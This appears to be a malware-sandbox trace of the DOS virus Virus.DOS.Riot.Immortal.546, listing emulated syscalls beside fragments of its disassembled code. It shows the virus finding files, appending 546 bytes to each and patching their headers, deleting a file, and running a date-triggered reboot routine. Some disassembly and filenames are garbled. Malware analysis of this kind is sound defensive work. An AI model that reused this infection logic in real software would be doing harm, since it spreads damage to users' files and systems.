Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.546

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:39.792848068Z 26 PC: 12b6c | Set disk transfer address
2018-12-17T22:45:39.794336042Z 53 PC: 12b72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:45:39.796095106Z 53 PC: 12b7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:45:39.797385199Z 44 PC: 12b8a | Get time 0x12b8a: cmp dl, 0xd
0x12b8d: jg 0x12b93
0x12b8f: mov al, 0x82
0x12b91: out 0x21, al
0x12b93: lea dx, word ptr [bp + 0x2cc]
0x12b97: call 0x12c87
0x12b9a: lea dx, word ptr [bp + 0x2dc]
0x12b9e: call 0x12c87
0x12ba1: mov ah, 0x3c
0x12ba3: mov cx, 0
0x12ba6: lea dx, word ptr [bp + 0x2ee]
0x12baa: int 0x21
0x12bac: lea dx, word ptr [bp + 0x2fc]
0x12bb0: mov si, 0x1f
0x12bb3: call 0x12cd8
0x12bb6: mov bx, ax
0x12bb8: mov ax, 0x4000
0x12bbb: mov cx, 0x1f
0x12bbe: lea si, word ptr [bp + 0x2fc]
0x12bc2: int 0x21
2018-12-17T22:45:39.799950467Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:39.81132513Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:39.817386004Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:39.818726571Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.16841148Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.17025936Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.17346471Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.189035305Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.200201176Z 60 PC: 12bac | Create or truncate file
2018-12-17T22:45:40.21147547Z 64 PC: 12bc4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:45:40.221503344Z 62 PC: 12bd3 | Close file
2018-12-17T22:45:40.22962096Z 44 PC: 12bd7 | Get time 0x12bd7: cmp dl, 0x32
0x12bda: jg 0x12c08
0x12bdc: mov si, 0x12
0x12bdf: lea dx, word ptr [bp + 0x1b6]
0x12be3: call 0x12cd8
0x12be6: mov ah, 9
0x12be8: int 0x21
0x12bea: mov si, 0x12
0x12bed: call 0x12cd8
0x12bf0: mov ah, 0
0x12bf2: int 0x16
0x12bf4: jmp 0x12c08
0x12bf6: sub byte ptr [si], cl
0x12bf8: or al, 0x2e
0x12bfa: adc dx, word ptr [di]
0x12bfc: and byte ptr [di], cl
0x12bfe: outsw dx, word ptr [si]
0x12bff: je 0x12c75
0x12c01: jno 0x12c63
0x12c03: pushaw
2018-12-17T22:45:40.232186909Z 67 PC: 12cf0 | Get or set file attributes
2018-12-17T22:45:40.238888767Z 65 PC: 12cf4 | Delete file (Filename = '')
2018-12-17T22:45:40.245636489Z 78 PC: 12c24 | Find first file
2018-12-17T22:45:40.252007145Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.259551775Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.267704737Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.269722086Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.283780209Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.28782701Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.295388281Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.304334373Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.308536545Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.316610108Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.323812886Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.326963714Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.336131262Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.337798082Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.346009395Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.358945159Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.362346748Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.372648266Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.382236193Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.396779718Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.405563675Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.418937514Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.426784932Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.436265168Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.440134665Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.44811835Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.455935211Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.458857049Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.468550995Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.470404717Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.48032029Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.490274966Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.493025793Z 61 PC: 12c8c | Open file (Filename = 'yb.com')
2018-12-17T22:45:40.499889643Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.507968297Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.509832057Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.518458809Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.520853306Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.527933865Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.541868576Z 42 PC: 12c4f | Get date 0x12c4f: cmp dh, 0x11
0x12c52: jl 0x12c7b
0x12c54: cmp dl, 8
0x12c57: jl 0x12c7b
0x12c59: lea dx, word ptr [bp + 0x1b6]
0x12c5d: mov si, 0x12
0x12c60: call 0x12cd8
0x12c63: mov bx, dx
0x12c65: mov ah, 0x19
0x12c67: int 0x21
0x12c69: mov cx, 0x25
0x12c6c: mov dx, 0
0x12c6f: push ds
0x12c70: pop es
0x12c71: mov byte ptr [bp + 0x237], 0x26
0x12c76: int 0x19
0x12c78: add sp, 2
0x12c7b: mov ah, 0x1a
0x12c7d: mov dx, 0x80
0x12c80: int 0x21
2018-12-17T22:45:40.545397654Z 26 PC: 12c82 | Set disk transfer address
2018-12-17T22:45:40.547577057Z 26 PC: 12b6c | Set disk transfer address
2018-12-17T22:45:40.549118612Z 53 PC: 12b72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:45:40.551253152Z 53 PC: 12b7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:45:40.554232387Z 44 PC: 12b8a | Get time 0x12b8a: cmp dl, 0xd
0x12b8d: jg 0x12b93
0x12b8f: mov al, 0x82
0x12b91: out 0x21, al
0x12b93: lea dx, word ptr [bp + 0x2cc]
0x12b97: call 0x12c87
0x12b9a: lea dx, word ptr [bp + 0x2dc]
0x12b9e: call 0x12c87
0x12ba1: mov ah, 0x3c
0x12ba3: mov cx, 0
0x12ba6: lea dx, word ptr [bp + 0x2ee]
0x12baa: int 0x21
0x12bac: lea dx, word ptr [bp + 0x2fc]
0x12bb0: mov si, 0x1f
0x12bb3: call 0x12cd8
0x12bb6: mov bx, ax
0x12bb8: mov ax, 0x4000
0x12bbb: mov cx, 0x1f
0x12bbe: lea si, word ptr [bp + 0x2fc]
0x12bc2: int 0x21
2018-12-17T22:45:40.557033288Z 61 PC: 12c8c | Open file (Filename = '�B+ə�!-')
2018-12-17T22:45:40.565870435Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.569056399Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.571289342Z 61 PC: 12c8c | Open file (Filename = '@�"��')
2018-12-17T22:45:40.579384256Z 60 PC: 12bac | Create or truncate file
2018-12-17T22:45:40.61888299Z 64 PC: 12bc4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:45:40.623079722Z 62 PC: 12bd3 | Close file
2018-12-17T22:45:40.660245735Z 44 PC: 12bd7 | Get time 0x12bd7: cmp dl, 0x32
0x12bda: jg 0x12c08
0x12bdc: mov si, 0x12
0x12bdf: lea dx, word ptr [bp + 0x1b6]
0x12be3: call 0x12cd8
0x12be6: mov ah, 9
0x12be8: int 0x21
0x12bea: mov si, 0x12
0x12bed: call 0x12cd8
0x12bf0: mov ah, 0
0x12bf2: int 0x16
0x12bf4: jmp 0x12c08
0x12bf6: sub byte ptr [si], cl
0x12bf8: or al, 0x2e
0x12bfa: adc dx, word ptr [di]
0x12bfc: and byte ptr [di], cl
0x12bfe: outsw dx, word ptr [si]
0x12bff: je 0x12c75
0x12c01: jno 0x12c63
0x12c03: pushaw
2018-12-17T22:45:40.664047335Z 9 PC: 12bea | Display string (Could not find end pointer)